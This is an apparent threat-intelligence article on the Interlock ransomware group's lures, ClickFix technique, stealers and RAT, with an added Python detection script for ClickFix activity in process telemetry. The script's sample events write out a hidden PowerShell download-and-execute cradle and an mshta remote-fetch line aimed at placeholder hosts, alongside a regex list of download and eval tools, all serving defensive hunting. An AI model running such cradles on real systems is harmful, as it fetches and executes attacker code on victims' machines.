Interlock Ransomware Adapts with New Deceptive Tactics and Tools


Since it first surfaced in late September 2024, the ransomware group known as Interlock has built a reputation for inventive tradecraft. Its victim count is modest next to the most prolific groups, but its attacks have been consequential, with targets concentrated in North America and Europe. Its most widely reported incident was the breach of Texas Tech University Health Sciences Center, which exposed the records of nearly 1.5 million patients. Continual refinement of its methods has kept Interlock a prominent threat.

Deceptive Tactics and Social Engineering

Interlock's early intrusions began with fake browser updates for Google Chrome and Microsoft Edge. From January the group widened the lure to counterfeit security-software updates impersonating FortiClient, Ivanti Secure Access and Palo Alto Networks GlobalProtect, a shift that shows how readily it retunes its lures.

Interlock has also adopted the ClickFix social-engineering technique. A compromised legitimate website displays a fake CAPTCHA whose "verification" step instructs the victim to copy a command and paste it into a Windows terminal; the command is PowerShell that fetches and runs the next stage, so the victim, not an exploit, performs the execution. ClickFix has spread since August 2024 and has been used by other actors, including North Korea's Lazarus group. In Interlock's campaigns the pasted command led to the installation of a PyInstaller-packaged executable that deployed a PowerShell backdoor. No further payloads were observed arriving through that backdoor, which suggests Interlock was still experimenting with the technique rather than exploiting it fully.
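The copy-and-paste step above leaves a distinctive trace in endpoint telemetry: an interactive parent (explorer.exe for the Win+R Run box, or a terminal host) spawning a script host whose command line carries a download-and-execute cradle. The hunt below is an added illustration, not code from the article or from Interlock's tooling. It scores constructed Sysmon-style process-creation records against those traits; the field names follow Sysmon Event ID 1, and the sample command lines, hosts and URLs are assumptions modelled on the usual ClickFix shape.

```python
"""ClickFix hunt over process-creation telemetry.

Added example: not from the article and not Interlock's tooling. The events
below are constructed, Sysmon Event ID 1 style records (Image, ParentImage,
CommandLine); any EDR export carrying those three fields can be scored the
same way.
"""
import re

# Script hosts that ClickFix lures drive. The fake CAPTCHA tells the victim to
# press Win+R (or open a terminal) and paste a one-liner for one of these.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Parents that mean a human launched the host: the Run box is a child of
# explorer.exe, and a pasted command in Windows Terminal is parented by it.
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe"}

# Content indicators; each one that matches the command line adds 1 to the
# score. Together they describe a download-and-execute cradle with evasion.
INDICATORS = {
    "web_cradle": re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring"
        r"|downloadfile|start-bitstransfer|curl|certutil)\b", re.I),
    "eval": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I),
    "encoded": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    # ClickFix one-liners often end in a comment such as '# I am not a robot'
    # so the Run box shows the victim something reassuring.
    "captcha_lure": re.compile(
        r"#.*(i am not a robot|verify you are human|captcha)", re.I),
    "remote_url": re.compile(r"https?://", re.I),
}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(event: dict) -> tuple[int, list[str]]:
    """Return (score, matched indicators) for one process-creation event.

    A score of 0 means the event is not a ClickFix candidate. The parent
    check only ever adds to a score already earned by the command line, so
    a user simply opening PowerShell from the Start menu scores 0.
    """
    if basename(event.get("Image", "")) not in SCRIPT_HOSTS:
        return 0, []
    cmd = event.get("CommandLine", "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    if not hits:
        return 0, []
    if basename(event.get("ParentImage", "")) in INTERACTIVE_PARENTS:
        hits.append("interactive_parent")
    return len(hits), hits


def hunt(events, threshold: int = 2):
    """Return (RecordId, score, indicators) for events at or above threshold."""
    findings = []
    for event in events:
        score, hits = score_event(event)
        if score >= threshold:
            findings.append((event["RecordId"], score, hits))
    return findings


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed sample telemetry; the paths, hosts and URLs are placeholders.
SAMPLE_EVENTS = [
    # 1000: user opened PowerShell from the Start menu, no arguments.
    {"RecordId": 1000, "Image": PS, "ParentImage": EXPLORER,
     "CommandLine": '"' + PS + '"'},
    # 1001: admin at a terminal running an ordinary cmdlet.
    {"RecordId": 1001, "Image": PS,
     "ParentImage": r"C:\Program Files\WindowsApps\Terminal\WindowsTerminal.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Process"},
    # 1002: ClickFix shape, pasted into the Run box from a fake CAPTCHA page.
    {"RecordId": 1002, "Image": PS, "ParentImage": EXPLORER,
     "CommandLine": 'powershell.exe -w hidden -ep bypass -c "iwr '
                    'http://update.example.invalid/verify.ps1 | iex" '
                    "# I am not a robot - reCAPTCHA Verification ID: 3024"},
    # 1003: scheduled backup job; a policy bypass alone is common and benign.
    {"RecordId": 1003, "Image": PS,
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    # 1004: mshta variant of the same lure, fetching a remote HTA.
    {"RecordId": 1004, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": EXPLORER,
     "CommandLine": "mshta.exe http://cdn.example.invalid/captcha.hta"},
]

if __name__ == "__main__":
    for record_id, score, hits in hunt(SAMPLE_EVENTS):
        print(f"RecordId {record_id}: score {score}, indicators {hits}")
```

The threshold of 2 is deliberate: a lone `-ExecutionPolicy Bypass` from a service parent is everyday administration, while a cradle plus an interactive parent is not. On a live host the Run box also persists pasted strings under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which corroborates a hit from this logic during triage; a PyInstaller bundle dropped by such a command would then be the next artifact to collect.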

Tools of the Trade

Interlock has avoided the high visibility of the most prolific ransomware groups while still building out a toolset that includes keyloggers and infostealers. Two stealers stand out: BerserkStealer and LummaStealer, the latter a prominent malware-as-a-service offering since 2022. These tools harvest credentials and other sensitive data from victims, which feeds the later stages of an intrusion. The group's steady investment in tooling shows its intent to remain a significant ransomware threat.

Alongside the stealers, Interlock deploys custom ransomware for both Windows and Linux systems, paired with a bespoke remote access trojan (RAT) backdoor known as Interlock RAT that gives the operators a foothold inside the victim network. Lateral movement then relies on the Remote Desktop Protocol (RDP), using credentials harvested by the infostealers. Interlock has also used PuTTY and AnyDesk for remote access, tools that blend in with legitimate administrative activity and let the operators move through and control victim systems.

Evolving Strategies and Implications for Victims

Interlock's recent revision of its ransom note marks a shift in pressure tactics: the note now stresses the legal liability a company could face if its stolen data is leaked, adding a regulatory threat to the usual reputational one. A notable attack earlier this month targeted the National Defense Corporation, a subsidiary of National Presto Industries; Interlock claimed to have stolen nearly 3 million files, raising concerns about the scope and severity of its attacks.

The evolution of Interlock's tactics reflects a keen reading of the threat landscape. By refining its lures and leaning on social engineering rather than exploits, the group has carved out a niche as a resilient, adaptive actor. Its willingness to experiment with new methods such as ClickFix shows a forward-looking mindset that keeps it ahead of defenses tuned to older delivery techniques.

Conclusion: Addressing the Persistent Threat

Interlock's short history, from its appearance in late September 2024 through the Texas Tech University Health Sciences Center breach and its subsequent campaigns in North America and Europe, shows a group that compensates for a modest victim count with steady refinement of its lures and tooling. That capacity to adapt makes it a persistent threat, and it has pushed organizations to improve their defenses and stay vigilant, in particular against delivery that depends on the user running a pasted command. As long as Interlock keeps innovating, it will remain a formidable adversary.
